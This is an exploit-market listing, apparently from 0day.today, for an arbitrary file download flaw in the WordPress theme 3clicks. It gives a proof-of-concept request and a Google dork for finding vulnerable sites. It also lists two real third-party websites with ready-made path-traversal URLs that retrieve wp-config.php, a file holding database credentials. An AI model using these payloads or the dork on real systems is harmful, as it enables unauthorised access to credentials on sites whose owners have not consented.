[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Theme 3clicks Arbitrary File Download Vulnerability

Author
gujjar(pcp)
Risk
[
Security Risk High
]
0day-ID
0day-ID-22661
Category
web applications
Date add
18-09-2014
Platform
php
POC : http://127.0.0.1/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Google Dork : inurl:"/wp-content/themes/3clicks/"
Demo Sites
http://powerliftingforpups.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://richmondprolab.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2024-12-24]  #